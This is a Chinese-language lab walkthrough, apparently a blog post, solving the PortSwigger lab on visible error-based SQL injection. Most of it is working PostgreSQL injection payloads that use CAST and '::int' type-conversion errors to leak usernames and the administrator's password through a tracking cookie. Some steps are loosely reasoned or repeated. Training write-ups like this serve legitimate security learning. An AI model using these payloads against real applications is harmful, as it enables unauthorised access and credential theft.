Portswigger靶场之Visible error-based SQL injection通关秘籍

一、分析题目

提示告诉我们:该靶场存在一个 SQL 注入漏洞。该应用程序使用跟踪 cookie 进行分析,并执行包含所提交 cookie 值的 SQL 查询,但 SQL 查询的结果并未被返回。该数据库中有一个名为"用户"的不同表格,其中包含"用户名"和"密码"两列。要完成这个实验,需要找到一种方法泄露管理员用户的密码,然后登录他们的账户。

二、判断类型

1、判断注入类型

首先,我们尝试输入一个单引号时报错,输入两个单引号时页面显示正常,可以判断为布尔注入

2、判断数据库类型

接下来我们通过下面语句

sql 复制代码
'||(select version())||'

可以排除他不是Oracle(它不认识 version() 函数)和Microsoft SQL Server(它不认识 ||)数据库

接下来通过以下语句报错,可以说明他是PostgreSQL数据库

sql 复制代码
'||(select @@version)||'

三、进行注入

首先,通过以下代码说明确实有username这一列

sql 复制代码
TrackingId=Uadq1mfzxchQIzk5'||(select username from users limit 1)||'
sql 复制代码
'||(select password from users where username ='administrator' limit 1)||'

上面输入查询密码的语句出现以下报错:

Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = 'Uadq1mfzxchQIzk5'||(select password from users where usernam'. Expected char

是因为我们的注入语句因为超出了应用程序允许的最大字符长度限制,没有被完整地传递给后端数据库。

既然问题是总长度超限,那么缩短注入语句的长度就是一个直接有效的解决方案。Uadq1mfzxchQIzk5这部分字符串是原始查询的一部分,通常是一个会话ID或跟踪Cookie的值。在注入时,这部分内容对于我们来说是没有意义的"噪音",只是为了满足原始查询的格式。我们可以通过将其删除或替换为更短的字符,为真正想执行的恶意查询(即 ||(select ...) 部分)腾出更多的空间,使其能够被完整地发送到数据库执行。

删掉ID是为了解决长度限制 的问题,但是仍然报错,是因为数据类型不匹配 。此时我们引入 CAST 函数,CAST 函数是SQl通用的一个函数,用于将一个值从一种数据类型转换为另一种数据类型。这个函数可以用于转换数值、日期、时间以及字符串数据类型。

sql 复制代码
'and 1=cast((select 1)as int)--+

当然,我们也可以使用 PostgreSQL 特有的 :: 快捷语法达成相同效果

sql 复制代码
=' and 1=(select 1)::integer --

1、通用方法(cast):

接下来我们开始找帐号和密码,我们通过一下语句不是为了让查询正常返回,而是为了故意引发一个数据库错误,进而 观察Web应用是否返回了数据库的详细错误信息,来判断 users 表和 username 列、password列是否存在。

sql 复制代码
'and 1=cast((select username from users limit 1)as int)--+
sql 复制代码
'and 1=cast((select password from users limit 1)as int)--+

2、PostgreSQL特有方法(::):

我们也可以通过下列语句达到相同效果

sql 复制代码
'and 1=(select username from users limit 1)::int)--+
'and 1=(select username from users limit 1)::int)--+

四、成功通关

拿到帐号密码后,登陆即通关

学习参考:归去来兮-zangcc 【送书活动第2期】打靶Portswigger系列------ 一口气通关18个SQL注入靶场详细流程(文末送书)

相关推荐
RestCloud13 小时前
SQL Server到Hive:批处理ETL性能提升30%的实战经验
数据库·api
RestCloud13 小时前
为什么说零代码 ETL 是未来趋势?
数据库·api
ClouGence15 小时前
CloudCanal + Paimon + SelectDB 从 0 到 1 构建实时湖仓
数据库
DemonAvenger1 天前
NoSQL与MySQL混合架构设计:从入门到实战的最佳实践
数据库·mysql·性能优化
AAA修煤气灶刘哥1 天前
后端人速藏!数据库PD建模避坑指南
数据库·后端·mysql
RestCloud2 天前
揭秘 CDC 技术:让数据库同步快人一步
数据库·api
得物技术2 天前
MySQL单表为何别超2000万行?揭秘B+树与16KB页的生死博弈|得物技术
数据库·后端·mysql
可涵不会debug2 天前
【IoTDB】时序数据库选型指南:工业大数据场景下的技术突围
数据库·时序数据库
ByteBlossom2 天前
MySQL 面试场景题之如何处理 BLOB 和CLOB 数据类型?
数据库·mysql·面试